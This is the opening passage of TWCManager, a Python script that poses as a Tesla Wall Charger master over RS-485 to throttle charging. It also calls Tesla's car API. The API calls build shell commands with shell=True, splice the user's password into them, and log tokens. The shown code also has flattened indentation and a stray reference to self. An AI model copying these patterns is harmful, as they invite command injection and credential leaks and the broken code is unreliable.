# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# For more information, please visit http://unlicense.org
################################################################################
# What's TWCManager good for?
#
# This script (TWCManager) pretends to be a Tesla Wall Charger (TWC) set to
# master mode. When wired to the IN or OUT pins of real TWC units set to slave
# mode (rotary switch position F), TWCManager can tell them to limit car
# charging to any whole amp value between 5A and the max rating of the charger.
# Charging can also be stopped so the car goes to sleep.
#
# This level of control is useful for having TWCManager track the real-time
# availability of green energy sources and direct the slave TWCs to use near the
# exact amount of energy available. This saves energy compared to sending the
# green energy off to a battery for later car charging or off to the grid where
# some of it is lost in transmission.
#
# TWCManager can also be set up to only allow charging during certain hours,
# stop charging if a grid overload or "save power day" is detected, reduce
# charging on one TWC when a "more important" one is plugged in, or whatever
# else you might want to do.
#
# One thing TWCManager does not have direct access to is the battery charge
# percentage of each plugged-in car. There are hints on forums that some TWCs
# do report battery state, but we have yet to see a TWC send such a message.
# It's possible the feature exists in TWCs with newer firmware.
# This is unfortunate, but if you own a Tesla vehicle being charged, people have
# figured out how to get its charge state by contacting Tesla's servers using
# the same password you use in the Tesla phone app. Be very careful not to
# expose that password because it allows unlocking and starting the car.
################################################################################
# Overview of protocol TWCs use to load share
#
# A TWC set to slave mode (rotary switch position F) sends a linkready message
# every 10 seconds.
# The message contains a unique 4-byte id that identifies that particular slave
# as the sender of the message.
#
# A TWC set to master mode sees a linkready message. In response, it sends a
# heartbeat message containing the slave's 4-byte id as the intended recipient
# of the message.
# The master's 4-byte id is included as the sender of the message.
#
# Slave sees a heartbeat message from master directed to its unique 4-byte id
# and responds with its own heartbeat message containing the master's 4-byte id
# as the intended recipient of the message.
# The slave's 4-byte id is included as the sender of the message.
#
# Master sends a heartbeat to a slave around once per second and expects a
# response heartbeat from the slave.
# Slaves do not send heartbeats without seeing one from a master first. If
# heartbeats stop coming from master, slave resumes sending linkready every 10
# seconds.
# If slaves stop replying to heartbeats from master, master stops sending
# heartbeats after about 26 seconds.
#
# Heartbeat messages contain a data block used to negotiate the amount of power
# available to each slave and to the master.
# The first byte is a status indicating things like is TWC plugged in, does it
# want power, is there an error, etc.
# Next two bytes indicate the amount of power requested or the amount allowed in
# 0.01 amp increments.
# Next two bytes indicate the amount of power being used to charge the car, also in
# 0.01 amp increments.
# Remaining bytes always contain a value of 0.
import serial
import time
import re
import subprocess
import queue
import random
import math
import struct
import sys
import traceback
import sysv_ipc
import json
from datetime import datetime
import threading
##########################
#
# Configuration parameters
#
# Most users will have only one ttyUSB adapter plugged in and the default value
# of '/dev/ttyUSB0' below will work. If not, run 'dmesg |grep ttyUSB' on the
# command line to find your rs485 adapter and put its ttyUSB# value in the
# parameter below.
# If you're using a non-USB adapter like an RS485 shield, the value may need to
# be something like '/dev/serial0'.
rs485Adapter = '/dev/ttyUSB0'
# Set wiringMaxAmpsAllTWCs to the maximum number of amps your charger wiring
# can handle. I default this to a low 6A which should be safe with the minimum
# standard of wiring in the areas of the world that I'm aware of.
# Most U.S. chargers will be wired to handle at least 40A and sometimes 80A,
# whereas EU chargers will handle at most 32A (using 3 AC lines instead of 2 so
# the total power they deliver is similar).
# Setting wiringMaxAmpsAllTWCs too high will trip the circuit breaker on your
# charger at best or START A FIRE if the circuit breaker malfunctions.
# Keep in mind that circuit breakers are designed to handle only 80% of their
# max power rating continuously, so if your charger has a 50A circuit breaker,
# put 50 * 0.8 = 40 here.
# 40 amp breaker * 0.8 = 32 here.
# 30 amp breaker * 0.8 = 24 here.
# 100 amp breaker * 0.8 = 80 here.
# IF YOU'RE NOT SURE WHAT TO PUT HERE, ASK THE ELECTRICIAN WHO INSTALLED YOUR
# CHARGER.
wiringMaxAmpsAllTWCs = 40
# If all your chargers share a single circuit breaker, set wiringMaxAmpsPerTWC
# to the same value as wiringMaxAmpsAllTWCs.
# Rarely, each TWC will be wired to its own circuit breaker. If you're
# absolutely sure your chargers each have a separate breaker, put the value of
# that breaker * 0.8 here, and put the sum of all breakers * 0.8 as the value of
# wiringMaxAmpsAllTWCs.
# For example, if you have two TWCs each with a 50A breaker, set
# wiringMaxAmpsPerTWC = 50 * 0.8 = 40 and wiringMaxAmpsAllTWCs = 40 + 40 = 80.
wiringMaxAmpsPerTWC = 40
# https://teslamotorsclub.com/tmc/threads/model-s-gen2-charger-efficiency-testing.78740/#post-1844789
# says you're using 10.85% more power (91.75/82.77=1.1085) charging at 5A vs 40A,
# 2.48% more power at 10A vs 40A, and 1.9% more power at 20A vs 40A. This is
# using a car with 2nd generation onboard AC/DC converter (VINs ending in 20000
# and higher).
# https://teslamotorsclub.com/tmc/threads/higher-amp-charging-is-more-efficient.24972/
# says that cars using a 1st generation charger may use up to 30% more power
# at 6A vs 40A! However, the data refers to 120V 12A charging vs 240V 40A
# charging. 120V 12A is technically the same power as 240V 6A, but the car
# batteries need 400V DC to charge and a lot more power is wasted converting
# 120V AC to 400V DC than 240V AC to 400V DC.
#
# The main point is 6A charging wastes a lot of power, so we default to charging
# at a minimum of 12A by setting minAmpsPerTWC to 12. I picked 12A instead of 10A
# because there is a theory that multiples of 3A are most efficient, though I
# couldn't find any data showing that had been tested.
#
# Most EU chargers are connected to 230V, single-phase power which means 12A is
# about the same power as in US chargers. If you have three-phase power, you can
# lower minAmpsPerTWC to 6 and still be charging with more power than 12A on
# single-phase. For example, 12A * 230V * 1 = 2760W for single-phase power, while
# 6A * 230V * 3 = 4140W for three-phase power. Consult an electrician if this
# doesn't make sense.
#
# https://forums.tesla.com/forum/forums/charging-lowest-amperage-purposely
# says another reason to charge at higher power is to preserve battery life.
# The best charge rate is the capacity of the battery pack / 2. Home chargers
# can't reach that rate, so charging as fast as your wiring supports is best
# from that standpoint. It's not clear how much damage charging at slower
# rates really does.
minAmpsPerTWC = 12
# When you have more than one vehicle associated with the Tesla car API and
# onlyChargeMultiCarsAtHome = True, cars will only be controlled by the API when
# parked at home. For example, when one vehicle is plugged in at home and
# another is plugged in at a remote location and you've set TWCManager to stop
# charging at the current time, only the one plugged in at home will be stopped
# from charging using the car API.
# Unfortunately, bugs in the car GPS system may cause a car to not be reported
# as at home even if it is, in which case the car might not be charged when you
# expect it to be. If you encounter that problem with multiple vehicles, you can
# set onlyChargeMultiCarsAtHome = False, but you may encounter the problem of
# a car not at home being stopped from charging by the API.
onlyChargeMultiCarsAtHome = True
# After determining how much green energy is available for charging, we add
# greenEnergyAmpsOffset to the value. This is most often given a negative value
# equal to the average amount of power consumed by everything other than car
# charging. For example, if your house uses an average of 2.8A to power
# computers, lights, etc while you expect the car to be charging, set
# greenEnergyAmpsOffset = -2.8.
#
# If you have solar panels, look at your utility meter while your car charges.
# If it says you're using 0.67kW, that means you should set
# greenEnergyAmpsOffset = -0.67kW * 1000 / 240V = -2.79A assuming you're on the
# North American 240V grid. In other words, during car charging, you want your
# utility meter to show a value close to 0kW meaning no energy is being sent to
# or from the grid.
greenEnergyAmpsOffset = 0
# Choose how much debugging info to output.
# 0 is no output other than errors.
# 1 is just the most useful info.
# 2-8 add debugging info
# 9 includes raw RS-485 messages transmitted and received (2-3 per sec)
# 10 is all info.
# 11 is more than all info. ;)
debugLevel = 1
# Choose whether to display milliseconds after time on each line of debug info.
displayMilliseconds = False
# Normally we fake being a TWC Master using fakeMaster = 1.
# Two other settings are available, but are only useful for debugging and
# experimenting:
# Set fakeMaster = 0 to fake being a TWC Slave instead of Master.
# Set fakeMaster = 2 to display received RS-485 messages but not send any
# unless you use the debugging web interface
# (index.php?debugTWC=1) to send messages.
fakeMaster = 1
# TWC's rs485 port runs at 9600 baud which has been verified with an
# oscilloscope. Don't change this unless something changes in future hardware.
baud = 9600
# All TWCs ship with a random two-byte TWCID. We default to using 0x7777 as our
# fake TWC ID. There is a 1 in 64535 chance that this ID will match each real
# TWC on the network, in which case you should pick a different random id below.
# This isn't really too important because even if this ID matches another TWC on
# the network, that TWC will pick its own new random ID as soon as it sees ours
# conflicts.
fakeTWCID = bytearray(b'\x77\x77')
# TWCs send a seemingly-random byte after their 2-byte TWC id in a number of
# messages. I call this byte their "Sign" for lack of a better term. The byte
# never changes unless the TWC is reset or power cycled. We use hard-coded
# values for now because I don't know if there are any rules to what values can
# be chosen. I picked 77 because it's easy to recognize when looking at logs.
# These shouldn't need to be changed.
masterSign = bytearray(b'\x77')
slaveSign = bytearray(b'\x77')
#
# End configuration parameters
#
##############################
##############################
#
# Begin functions
#
def time_now():
global displayMilliseconds
return(datetime.now().strftime("%H:%M:%S" + (
".%f" if displayMilliseconds else "")))
def hex_str(s:str):
return " ".join("{:02X}".format(ord(c)) for c in s)
def hex_str(ba:bytearray):
return " ".join("{:02X}".format(c) for c in ba)
def run_process(cmd):
result = None
try:
result = subprocess.check_output(cmd, shell=True)
except subprocess.CalledProcessError:
# We reach this point if the process returns a non-zero exit code.
result = b''
return result
def load_settings():
global debugLevel, settingsFileName, nonScheduledAmpsMax, scheduledAmpsMax, \
scheduledAmpsStartHour, scheduledAmpsEndHour, \
scheduledAmpsDaysBitmap, hourResumeTrackGreenEnergy, kWhDelivered, \
carApiBearerToken, carApiRefreshToken, carApiTokenExpireTime, \
homeLat, homeLon
try:
fh = open(settingsFileName, 'r')
for line in fh:
m = re.search(r'^\s*nonScheduledAmpsMax\s*=\s*([-0-9.]+)', line, re.MULTILINE)
if(m):
nonScheduledAmpsMax = int(m.group(1))
if(debugLevel >= 10):
print("load_settings: nonScheduledAmpsMax set to " + str(nonScheduledAmpsMax))
continue
m = re.search(r'^\s*scheduledAmpsMax\s*=\s*([-0-9.]+)', line, re.MULTILINE)
if(m):
scheduledAmpsMax = int(m.group(1))
if(debugLevel >= 10):
print("load_settings: scheduledAmpsMax set to " + str(scheduledAmpsMax))
continue
m = re.search(r'^\s*scheduledAmpsStartHour\s*=\s*([-0-9.]+)', line, re.MULTILINE)
if(m):
scheduledAmpsStartHour = float(m.group(1))
if(debugLevel >= 10):
print("load_settings: scheduledAmpsStartHour set to " + str(scheduledAmpsStartHour))
continue
m = re.search(r'^\s*scheduledAmpsEndHour\s*=\s*([-0-9.]+)', line, re.MULTILINE)
if(m):
scheduledAmpsEndHour = float(m.group(1))
if(debugLevel >= 10):
print("load_settings: scheduledAmpsEndHour set to " + str(scheduledAmpsEndHour))
continue
m = re.search(r'^\s*scheduledAmpsDaysBitmap\s*=\s*([-0-9.]+)', line, re.MULTILINE)
if(m):
scheduledAmpsDaysBitmap = int(m.group(1))
if(debugLevel >= 10):
print("load_settings: scheduledAmpsDaysBitmap set to " + str(scheduledAmpsDaysBitmap))
continue
m = re.search(r'^\s*hourResumeTrackGreenEnergy\s*=\s*([-0-9.]+)', line, re.MULTILINE)
if(m):
hourResumeTrackGreenEnergy = float(m.group(1))
if(debugLevel >= 10):
print("load_settings: hourResumeTrackGreenEnergy set to " + str(hourResumeTrackGreenEnergy))
continue
m = re.search(r'^\s*kWhDelivered\s*=\s*([-0-9.]+)', line, re.MULTILINE)
if(m):
kWhDelivered = float(m.group(1))
if(debugLevel >= 10):
print("load_settings: kWhDelivered set to " + str(kWhDelivered))
continue
m = re.search(r'^\s*carApiBearerToken\s*=\s*(.+)', line, re.MULTILINE)
if(m):
carApiBearerToken = m.group(1)
if(debugLevel >= 10):
print("load_settings: carApiBearerToken set to " + str(carApiBearerToken))
continue
m = re.search(r'^\s*carApiRefreshToken\s*=\s*(.+)', line, re.MULTILINE)
if(m):
carApiRefreshToken = m.group(1)
if(debugLevel >= 10):
print("load_settings: carApiRefreshToken set to " + str(carApiRefreshToken))
continue
m = re.search(r'^\s*carApiTokenExpireTime\s*=\s*(.+)', line, re.MULTILINE)
if(m):
carApiTokenExpireTime = float(m.group(1))
if(debugLevel >= 10):
print("load_settings: carApiTokenExpireTime set to " + str(carApiTokenExpireTime))
continue
m = re.search(r'^\s*homeLat\s*=\s*(.+)', line, re.MULTILINE)
if(m):
homeLat = float(m.group(1))
if(debugLevel >= 10):
print("load_settings: homeLat set to " + str(homeLat))
continue
m = re.search(r'^\s*homeLon\s*=\s*(.+)', line, re.MULTILINE)
if(m):
homeLon = float(m.group(1))
if(debugLevel >= 10):
print("load_settings: homeLon set to " + str(homeLon))
continue
print(time_now() + ": load_settings: Unknown setting " + line)
fh.close()
except FileNotFoundError:
pass
def save_settings():
global debugLevel, settingsFileName, nonScheduledAmpsMax, scheduledAmpsMax, \
scheduledAmpsStartHour, scheduledAmpsEndHour, \
scheduledAmpsDaysBitmap, hourResumeTrackGreenEnergy, kWhDelivered, \
carApiBearerToken, carApiRefreshToken, carApiTokenExpireTime, \
homeLat, homeLon
fh = open(settingsFileName, 'w')
fh.write('nonScheduledAmpsMax=' + str(nonScheduledAmpsMax) +
'\nscheduledAmpsMax=' + str(scheduledAmpsMax) +
'\nscheduledAmpsStartHour=' + str(scheduledAmpsStartHour) +
'\nscheduledAmpsEndHour=' + str(scheduledAmpsEndHour) +
'\nscheduledAmpsDaysBitmap=' + str(scheduledAmpsDaysBitmap) +
'\nhourResumeTrackGreenEnergy=' + str(hourResumeTrackGreenEnergy) +
'\nkWhDelivered=' + str(kWhDelivered) +
'\ncarApiBearerToken=' + str(carApiBearerToken) +
'\ncarApiRefreshToken=' + str(carApiRefreshToken) +
'\ncarApiTokenExpireTime=' + str(int(carApiTokenExpireTime)) +
'\nhomeLat=' + str(homeLat) +
'\nhomeLon=' + str(homeLon)
)
fh.close()
def trim_pad(s:bytearray, makeLen):
# Trim or pad s with zeros so that it's makeLen length.
while(len(s) < makeLen):
s += b'\x00'
if(len(s) > makeLen):
s = s[0:makeLen]
return s
def send_msg(msg):
# Send msg on the RS485 network. We'll escape bytes with a special meaning,
# add a CRC byte to the message end, and add a C0 byte to the start and end
# to mark where it begins and ends.
global ser, timeLastTx, fakeMaster, slaveTWCRoundRobin
msg = bytearray(msg)
checksum = 0
for i in range(1, len(msg)):
checksum += msg[i]
msg.append(checksum & 0xFF)
# Escaping special chars:
# The protocol uses C0 to mark the start and end of the message. If a C0
# must appear within the message, it is 'escaped' by replacing it with
# DB and DC bytes.
# A DB byte in the message is escaped by replacing it with DB DD.
#
# User FuzzyLogic found that this method of escaping and marking the start
# and end of messages is based on the SLIP protocol discussed here:
# https://en.wikipedia.org/wiki/Serial_Line_Internet_Protocol
i = 0
while(i < len(msg)):
if(msg[i] == 0xc0):
msg[i:i+1] = b'\xdb\xdc'
i = i + 1
elif(msg[i] == 0xdb):
msg[i:i+1] = b'\xdb\xdd'
i = i + 1
i = i + 1
msg = bytearray(b'\xc0' + msg + b'\xc0')
if(debugLevel >= 9):
print("Tx@" + time_now() + ": " + hex_str(msg))
ser.write(msg)
timeLastTx = time.time()
def unescape_msg(msg:bytearray, msgLen):
# Given a message received on the RS485 network, remove leading and trailing
# C0 byte, unescape special byte values, and verify its data matches the CRC
# byte.
msg = msg[0:msgLen]
# See notes in send_msg() for the way certain bytes in messages are escaped.
# We basically want to change db dc into c0 and db dd into db.
# Only scan to one less than the length of the string to avoid running off
# the end looking at i+1.
i = 0
while i < len(msg):
if(msg[i] == 0xdb):
if(msg[i+1] == 0xdc):
# Replace characters at msg[i] and msg[i+1] with 0xc0,
# shortening the string by one character. In Python, msg[x:y]
# refers to a substring starting at x and ending immediately
# before y. y - x is the length of the substring.
msg[i:i+2] = [0xc0]
elif(msg[i+1] == 0xdd):
msg[i:i+2] = [0xdb]
else:
print(time_now(), "ERROR: Special character 0xDB in message is " \
"followed by invalid character 0x%02X. " \
"Message may be corrupted." %
(msg[i+1]))
# Replace the character with something even though it's probably
# not the right thing.
msg[i:i+2] = [0xdb]
i = i+1
# Remove leading and trailing C0 byte.
msg = msg[1:len(msg)-1]
return msg
def send_master_linkready1():
if(debugLevel >= 1):
print(time_now() + ": Send master linkready1")
# When master is powered on or reset, it sends 5 to 7 copies of this
# linkready1 message followed by 5 copies of linkready2 (I've never seen
# more or less than 5 of linkready2).
#
# This linkready1 message advertises master's TWCID to other slaves on the
# network.
# If a slave happens to have the same id as master, it will pick a new
# random TWCID. Other than that, slaves don't seem to respond to linkready1.
# linkready1 and linkready2 are identical except FC E1 is replaced by FB E2
# in bytes 2-3. Both messages will cause a slave to pick a new id if the
# slave's id conflicts with master.
# If a slave stops sending heartbeats for awhile, master may send a series
# of linkready1 and linkready2 messages in seemingly random order, which
# means they don't indicate any sort of startup state.
# linkready1 is not sent again after boot/reset unless a slave sends its
# linkready message.
# At that point, linkready1 message may start sending every 1-5 seconds, or
# it may not be sent at all.
# Behaviors I've seen:
# Not sent at all as long as slave keeps responding to heartbeat messages
# right from the start.
# If slave stops responding, then re-appears, linkready1 gets sent
# frequently.
# One other possible purpose of linkready1 and/or linkready2 is to trigger
# an error condition if two TWCs on the network transmit those messages.
# That means two TWCs have rotary switches setting them to master mode and
# they will both flash their red LED 4 times with top green light on if that
# happens.
# Also note that linkready1 starts with FC E1 which is similar to the FC D1
# message that masters send out every 4 hours when idle. Oddly, the FC D1
# message contains all zeros instead of the master's id, so it seems
# pointless.
# I also don't understand the purpose of having both linkready1 and
# linkready2 since only two or more linkready2 will provoke a response from
# a slave regardless of whether linkready1 was sent previously. Firmware
# trace shows that slaves do something somewhat complex when they receive
# linkready1 but I haven't been curious enough to try to understand what
# they're doing. Tests show neither linkready1 or 2 are necessary. Slaves
# send slave linkready every 10 seconds whether or not they got master
# linkready1/2 and if a master sees slave linkready, it will start sending
# the slave master heartbeat once per second and the two are then connected.
send_msg(bytearray(b'\xFC\xE1') + fakeTWCID + masterSign + bytearray(b'\x00\x00\x00\x00\x00\x00\x00\x00'))
def send_master_linkready2():
if(debugLevel >= 1):
print(time_now() + ": Send master linkready2")
# This linkready2 message is also sent 5 times when master is booted/reset
# and then not sent again if no other TWCs are heard from on the network.
# If the master has ever seen a slave on the network, linkready2 is sent at
# long intervals.
# Slaves always ignore the first linkready2, but respond to the second
# linkready2 around 0.2s later by sending five slave linkready messages.
#
# It may be that this linkready2 message that sends FB E2 and the master
# heartbeat that sends fb e0 message are really the same, (same FB byte
# which I think is message type) except the E0 version includes the TWC ID
# of the slave the message is intended for whereas the E2 version has no
# recipient TWC ID.
#
# Once a master starts sending heartbeat messages to a slave, it
# no longer sends the global linkready2 message (or if it does,
# they're quite rare so I haven't seen them).
send_msg(bytearray(b'\xFB\xE2') + fakeTWCID + masterSign + bytearray(b'\x00\x00\x00\x00\x00\x00\x00\x00'))
def send_slave_linkready():
# In the message below, \x1F\x40 (hex 0x1f40 or 8000 in base 10) refers to
# this being a max 80.00Amp charger model.
# EU chargers are 32A and send 0x0c80 (3200 in base 10).
#
# I accidentally changed \x1f\x40 to \x2e\x69 at one point, which makes the
# master TWC immediately start blinking its red LED 6 times with top green
# LED on. Manual says this means "The networked Wall Connectors have
# different maximum current capabilities".
msg = bytearray(b'\xFD\xE2') + fakeTWCID + slaveSign + bytearray(b'\x1F\x40\x00\x00\x00\x00\x00\x00')
if(self.protocolVersion == 2):
msg += bytearray(b'\x00\x00')
send_msg(msg)
def master_id_conflict():
# We're playing fake slave, and we got a message from a master with our TWCID.
# By convention, as a slave we must change our TWCID because a master will not.
fakeTWCID[0] = random.randint(0, 0xFF)
fakeTWCID[1] = random.randint(0, 0xFF)
# Real slaves change their sign during a conflict, so we do too.
slaveSign[0] = random.randint(0, 0xFF)
print(time_now() + ": Master's TWCID matches our fake slave's TWCID. " \
"Picked new random TWCID %02X%02X with sign %02X" % \
(fakeTWCID[0], fakeTWCID[1], slaveSign[0]))
def new_slave(newSlaveID, maxAmps):
global slaveTWCs, slaveTWCRoundRobin
try:
slaveTWC = slaveTWCs[newSlaveID]
# We didn't get KeyError exception, so this slave is already in
# slaveTWCs and we can simply return it.
return slaveTWC
except KeyError:
pass
slaveTWC = TWCSlave(newSlaveID, maxAmps)
slaveTWCs[newSlaveID] = slaveTWC
slaveTWCRoundRobin.append(slaveTWC)
if(len(slaveTWCRoundRobin) > 3):
print("WARNING: More than 3 slave TWCs seen on network. " \
"Dropping oldest: " + hex_str(slaveTWCRoundRobin[0].TWCID) + ".")
delete_slave(slaveTWCRoundRobin[0].TWCID)
return slaveTWC
def delete_slave(deleteSlaveID):
global slaveTWCs, slaveTWCRoundRobin
for i in range(0, len(slaveTWCRoundRobin)):
if(slaveTWCRoundRobin[i].TWCID == deleteSlaveID):
del slaveTWCRoundRobin[i]
break
try:
del slaveTWCs[deleteSlaveID]
except KeyError:
pass
def total_amps_actual_all_twcs():
global debugLevel, slaveTWCRoundRobin, wiringMaxAmpsAllTWCs
totalAmps = 0
for slaveTWC in slaveTWCRoundRobin:
totalAmps += slaveTWC.reportedAmpsActual
if(debugLevel >= 10):
print("Total amps all slaves are using: " + str(totalAmps))
return totalAmps
def car_api_available(email = None, password = None, charge = None):
global debugLevel, carApiLastErrorTime, carApiErrorRetryMins, \
carApiTransientErrors, carApiBearerToken, carApiRefreshToken, \
carApiTokenExpireTime, carApiVehicles
now = time.time()
apiResponseDict = {}
if(now - carApiLastErrorTime < carApiErrorRetryMins*60):
# It's been under carApiErrorRetryMins minutes since the car API
# generated an error. To keep strain off Tesla's API servers, wait
# carApiErrorRetryMins mins till we try again. This delay could be
# reduced if you feel the need. It's mostly here to deal with unexpected
# errors that are hopefully transient.
# https://teslamotorsclub.com/tmc/threads/model-s-rest-api.13410/page-114#post-2732052
# says he tested hammering the servers with requests as fast as possible
# and was automatically blacklisted after 2 minutes. Waiting 30 mins was
# enough to clear the blacklist. So at this point it seems Tesla has
# accepted that third party apps use the API and deals with bad behavior
# automatically.
if(debugLevel >= 11):
print(time_now() + ': Car API disabled for ' +
str(int(carApiErrorRetryMins*60 - (now - carApiLastErrorTime))) +
' more seconds due to recent error.')
return False
# Tesla car API info comes from https://timdorr.docs.apiary.io/
if(carApiBearerToken == '' or carApiTokenExpireTime - now < 30*24*60*60):
cmd = None
apiResponse = b''
# If we don't have a bearer token or our refresh token will expire in
# under 30 days, get a new bearer token. Refresh tokens expire in 45
# days when first issued, so we'll get a new token every 15 days.
if(carApiRefreshToken != ''):
cmd = 'curl -s -m 60 -X POST -H "accept: application/json" -H "Content-Type: application/json" -d \'' + \
json.dumps({'grant_type': 'refresh_token', \
'client_id': '81527cff06843c8634fdc09e8ac0abefb46ac849f38fe1e431c2ef2106796384', \
'client_secret': 'c7257eb71a564034f9419ee651c7d0e5f7aa6bfbd18bafb5c5c033b093bb2fa3', \
'refresh_token': carApiRefreshToken }) + \
'\' "https://owner-api.teslamotors.com/oauth/token"'
elif(email != None and password != None):
cmd = 'curl -s -m 60 -X POST -H "accept: application/json" -H "Content-Type: application/json" -d \'' + \
json.dumps({'grant_type': 'password', \
'client_id': '81527cff06843c8634fdc09e8ac0abefb46ac849f38fe1e431c2ef2106796384', \
'client_secret': 'c7257eb71a564034f9419ee651c7d0e5f7aa6bfbd18bafb5c5c033b093bb2fa3', \
'email': email, 'password': password }) + \
'\' "https://owner-api.teslamotors.com/oauth/token"'
if(cmd != None):
if(debugLevel >= 2):
# Hide car password in output
cmdRedacted = re.sub(r'("password": )"[^"]+"', r'\1[HIDDEN]', cmd)
print(time_now() + ': Car API cmd', cmdRedacted)
apiResponse = run_process(cmd)
# Example response:
# b'{"access_token":"4720d5f980c9969b0ca77ab39399b9103adb63ee832014fe299684201929380","token_type":"bearer","expires_in":3888000,"refresh_token":"110dd4455437ed351649391a3425b411755a213aa815171a2c6bfea8cc1253ae","created_at":1525232970}'
try:
apiResponseDict = json.loads(apiResponse.decode('ascii'))
except json.decoder.JSONDecodeError:
pass
try:
if(debugLevel >= 4):
print(time_now() + ': Car API auth response', apiResponseDict, '\n')
carApiBearerToken = apiResponseDict['access_token']
carApiRefreshToken = apiResponseDict['refresh_token']
carApiTokenExpireTime = now + apiResponseDict['expires_in']
except KeyError:
print(time_now() + ": ERROR: Can't access Tesla car via API. Please log in again via web interface.")
carApiLastErrorTime = now
# Instead of just setting carApiLastErrorTime, erase tokens to
# prevent further authorization attempts until user enters password
# on web interface. I feel this is safer than trying to log in every
# ten minutes with a bad token because Tesla might decide to block
# remote access to your car after too many authorization errors.
carApiBearerToken = ''
carApiRefreshToken = ''
save_settings()
if(carApiBearerToken != ''):
if(len(carApiVehicles) < 1):
cmd = 'curl -s -m 60 -H "accept: application/json" -H "Authorization:Bearer ' + \
carApiBearerToken + \
'" "https://owner-api.teslamotors.com/api/1/vehicles"'
if(debugLevel >= 8):
print(time_now() + ': Car API cmd', cmd)
try:
apiResponseDict = json.loads(run_process(cmd).decode('ascii'))
except json.decoder.JSONDecodeError:
pass
try:
if(debugLevel >= 4):
print(time_now() + ': Car API vehicle list', apiResponseDict, '\n')
for i in range(0, apiResponseDict['count']):
carApiVehicles.append(CarApiVehicle(apiResponseDict['response'][i]['id']))
except (KeyError, TypeError):
# This catches cases like trying to access
# apiResponseDict['response'] when 'response' doesn't exist in
# apiResponseDict.
print(time_now() + ": ERROR: Can't get list of vehicles via Tesla car API. Will try again in "
+ str(carApiErrorRetryMins) + " minutes.")
carApiLastErrorTime = now
return False
if(len(carApiVehicles) > 0):
# Wake cars if needed
needSleep = False
for vehicle in carApiVehicles:
if(charge == True and vehicle.stopAskingToStartCharging):
if(debugLevel >= 8):
print(time_now() + ": Don't charge vehicle " + str(vehicle.ID)
+ " because vehicle.stopAskingToStartCharging == True")
continue
if(now - vehicle.lastErrorTime < carApiErrorRetryMins*60):
# It's been under carApiErrorRetryMins minutes since the car
# API generated an error on this vehicle. Don't send it more
# commands yet.
if(debugLevel >= 8):
print(time_now() + ": Don't send commands to vehicle " + str(vehicle.ID)
+ " because it returned an error in the last "
+ str(carApiErrorRetryMins) + " minutes.")
continue
if(vehicle.ready()):
continue
if(now - vehicle.lastWakeAttemptTime <= vehicle.delayNextWakeAttempt):
if(debugLevel >= 10):
print(time_now() + ": car_api_available returning False because we are still delaying "
+ str(delayNextWakeAttempt) + " seconds after the last failed wake attempt.")
return False
# It's been delayNextWakeAttempt seconds since we last failed to
# wake the car, or it's never been woken. Wake it.
vehicle.lastWakeAttemptTime = now
cmd = 'curl -s -m 60 -X POST -H "accept: application/json" -H "Authorization:Bearer ' + \
carApiBearerToken + \
'" "https://owner-api.teslamotors.com/api/1/vehicles/' + \
str(vehicle.ID) + '/wake_up"'
if(debugLevel >= 8):
print(time_now() + ': Car API cmd', cmd)
try:
apiResponseDict = json.loads(run_process(cmd).decode('ascii'))
except json.decoder.JSONDecodeError:
pass
state = 'error'
try:
if(debugLevel >= 4):
print(time_now() + ': Car API wake car response', apiResponseDict, '\n')
state = apiResponseDict['response']['state']
except (KeyError, TypeError):
# This catches unexpected cases like trying to access
# apiResponseDict['response'] when 'response' doesn't exist
# in apiResponseDict.
state = 'error'
if(state == 'online'):
# With max power saving settings, car will almost always
# report 'asleep' or 'offline' the first time it's sent
# wake_up. Rarely, it returns 'online' on the first wake_up
# even when the car has not been contacted in a long while.
# I suspect that happens when we happen to query the car
# when it periodically awakens for some reason.
vehicle.firstWakeAttemptTime = 0
vehicle.delayNextWakeAttempt = 0
# Don't alter vehicle.lastWakeAttemptTime because
# vehicle.ready() uses it to return True if the last wake
# was under 2 mins ago.
needSleep = True
else:
if(vehicle.firstWakeAttemptTime == 0):
vehicle.firstWakeAttemptTime = now
if(state == 'asleep' or state == 'waking'):
if(now - vehicle.firstWakeAttemptTime <= 10*60):
# http://visibletesla.com has a 'force wakeup' mode
# that sends wake_up messages once every 5 seconds
# 15 times. This generally manages to wake my car if
# it's returning 'asleep' state, but I don't think
# there is any reason for 5 seconds and 15 attempts.
# The car did wake in two tests with that timing,
# but on the third test, it had not entered online
# mode by the 15th wake_up and took another 10+
# seconds to come online. In general, I hear relays
# in the car clicking a few seconds after the first
# wake_up but the car does not enter 'waking' or
# 'online' state for a random period of time. I've
# seen it take over one minute, 20 sec.
#
# I interpret this to mean a car in 'asleep' mode is
# still receiving car API messages and will start
# to wake after the first wake_up, but it may take
# awhile to finish waking up. Therefore, we try
# waking every 30 seconds for the first 10 mins.
vehicle.delayNextWakeAttempt = 30;
elif(now - vehicle.firstWakeAttemptTime <= 70*60):
# Cars in 'asleep' state should wake within a
# couple minutes in my experience, so we should
# never reach this point. If we do, try every 5
# minutes for the next hour.
vehicle.delayNextWakeAttempt = 5*60;
else:
# Car hasn't woken for an hour and 10 mins. Try
# again in 15 minutes. We'll show an error about
# reaching this point later.
vehicle.delayNextWakeAttempt = 15*60;
elif(state == 'offline'):
if(now - vehicle.firstWakeAttemptTime <= 31*60):
# A car in offline state is presumably not connected
# wirelessly so our wake_up command will not reach
# it. Instead, the car wakes itself every 20-30
# minutes and waits some period of time for a
# message, then goes back to sleep. I'm not sure
# what the period of time is, so I tried sending
# wake_up every 55 seconds for 16 minutes but the
# car failed to wake.
# Next I tried once every 25 seconds for 31 mins.
# This worked after 19.5 and 19.75 minutes in 2
# tests but I can't be sure the car stays awake for
# 30secs or if I just happened to send a command
# during a shorter period of wakefulness.
vehicle.delayNextWakeAttempt = 25;
# I've run tests sending wake_up every 10-30 mins to
# a car in offline state and it will go hours
# without waking unless you're lucky enough to hit
# it in the brief time it's waiting for wireless
# commands. I assume cars only enter offline state
# when set to max power saving mode, and even then,
# they don't always enter the state even after 8
# hours of no API contact or other interaction. I've
# seen it remain in 'asleep' state when contacted
# after 16.5 hours, but I also think I've seen it in
# offline state after less than 16 hours, so I'm not
# sure what the rules are or if maybe Tesla contacts
# the car periodically which resets the offline
# countdown.
#
# I've also seen it enter 'offline' state a few
# minutes after finishing charging, then go 'online'
